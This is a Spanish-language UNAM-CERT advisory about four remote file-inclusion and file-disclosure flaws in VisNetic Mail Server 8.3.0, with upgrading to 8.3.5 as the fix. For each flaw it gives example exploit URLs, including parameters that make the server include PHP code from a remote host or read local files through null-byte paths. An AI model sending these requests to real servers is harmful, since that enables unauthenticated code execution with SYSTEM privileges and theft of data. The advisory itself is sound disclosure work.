Coordinación de Seguridad de la Información

Coordinación de Seguridad de la Información

Información y servicios de seguridad en cómputo

1 2 3 4 5 6 7

Vulnerabilidades rss pdf

Coordinación de Seguridad de la Información - UNAM-CERT -- DGTIC-UNAM

Vulnerabilidad de Seguridad UNAM-CERT-2005-596 Múltiples vulnerabilidades en VisNetic Mail Server.

Se reportaron varias vulnerabilidades en VisNetic Mail Server, que pueden explotarse para mostrar información sensible y comprometer un sistema vulnerable.

  • Fecha de Liberación: 27-Dic-2005
  • Ultima Revisión: 29-Dic-2005
  • Fuente:

    Secunia Research Advisory
    2005-62

  • Riesgo Altamente crítico
  • Problema de Vulnerabilidad Remoto
  • Tipo de Vulnerabilidad Verificación deficiente en parametros

Sistemas Afectados

VisNetic Mail Server 8.3.0
  1. Descripción

    Secunia Research reportó varias vulnerabilidades en VisNetic Mail Server, que pueden explotarse por personas maliciosas para mostrar información sensible y comprometer un sistema vulnerable.

    1. Los servicios webmail y webadmin corren con PHP configurado con "register_global" habilitado. Las variables "language" y "lang_settings" en "/accounts/inc/include.php" y "/admin/inc/include.php" no son inicializadas apropiadamente cuando se accesa a los scripts de forma directa. Esto hace posible sobrescribir las variables ocasionando que los scripts incluyan archivos PHP arbitrarios de fuentes locales y remotas.

      Ejemplo:
      http://[host]:32000/accounts/inc/include.php?language=0&lang_settings[0][1]=http://[host]/
      http://[host]:32000/admin/inc/include.php?language=0&lang_settings[0][1]=http://[host]/

      Una explotación exitosa permitirá la ejecución de código arbitrario PHP dentro de un servidor vulnerable con privilegios SYSTEM sin que requiera autenticación.

    2. La entrada que se pasa al párametro "lang" dentro de "/dir/include.html" no es validada apropiadamente antes de utilizarse para incluir archivos. Esto puede explotarse para agregar archivos arbitrarios desde fuentes locales y externas.

      Ejemplo:
      http://[host]:32000/dir/include.html?lang=[file]%00

      Una explotación exitosa permitirá mostrar archivos arbitrarios dentro de un servidor vulnerable sin requerir autenticación.

    3. La entrada que se pasa al parámetro "language" dentro de "/mail/settings.html" no es validada apropiadamente antes de ser guardada en la base de datos. Esto puede explotarse en conjunto con la sobrescritura de la variable "lang_settings" para incluir scripts PHP arbitrarios desde fuentes locales y externas.

      Ejemplo:
      http://[host]:32000/mail/settings.html?id=[current_id]&Save_x=1&language=TEST
      http://[host]:32000/mail/index.html?id=[current_id]&lang_settings[TEST]=test;http://[host]/;

      Una explotación exitosa permitirá la ejecución de scripts PHP arbitrarios dentro de un servidor vulnerable con privilegios SYSTEM pero requiere atentificarse.

    4. Las variables "default_layout" y "layout_settings" no son inicializadas cuando "/mail/include.html" encuentra una cadena HTTP_USER_AGENT que no reconoce. Esto puede explotarse en conjunto con la sobrescritura de las variables "default_layout" y "layout_settings" para mostrar el contenido de archivos locales.

      Ejemplo(utilizando un navegador non-IE/Mozilla/Firefox ):
      http://[host]:32000/mail/index.html?/mail/index.html?default_layout=OUTLOOK2003&layout_settings[OUTLOOK2003]=test;[file]%00;2

      Una explotación exitosa permitirá mostrar archivos arbitrarios dentro de un servidor vulnerable sin requerir atenticación.

    Las vulnerabilidades se confirmaron en la versión 8.3.0. Versiones anteriores también podrían ser afectadas.

  2. Impacto

    Exposición de información sensible.

    Acceso al sistema.

  3. Solución

    Actualizar a la versión 8.3.5.
    http://www.deerfield.com/download/visnetic-mailserver/

  4. Apéndices

    http://secunia.com/secunia_research/2005-62/advisory/

La Coordinación de Seguridad de la Información/UNAM-CERT agradece el apoyo en la elaboración ó traducción y revisión de éste Documento a:

  • Floriberto López Velázquez (flopez at seguridad dot unam dot mx)

UNAM-CERT
Equipo de Respuesta a Incidentes UNAM
Coordinación de Seguridad de la Información

incidentes at seguridad.unam.mx
phishing at seguridad.unam.mx
http://www.cert.org.mx
http://www.seguridad.unam.mx
ftp://ftp.seguridad.unam.mx
Tel: 56 22 81 69
Fax: 56 22 80 47


Universidad Nacional Autonoma de México AENOR LOGO FIRST LOGO Aviso legal |  Créditos |  Staff |  Acerca |  Contacto |  FTP |  Administración
Copyright © Todos los derechos reservados
UNAM - CERT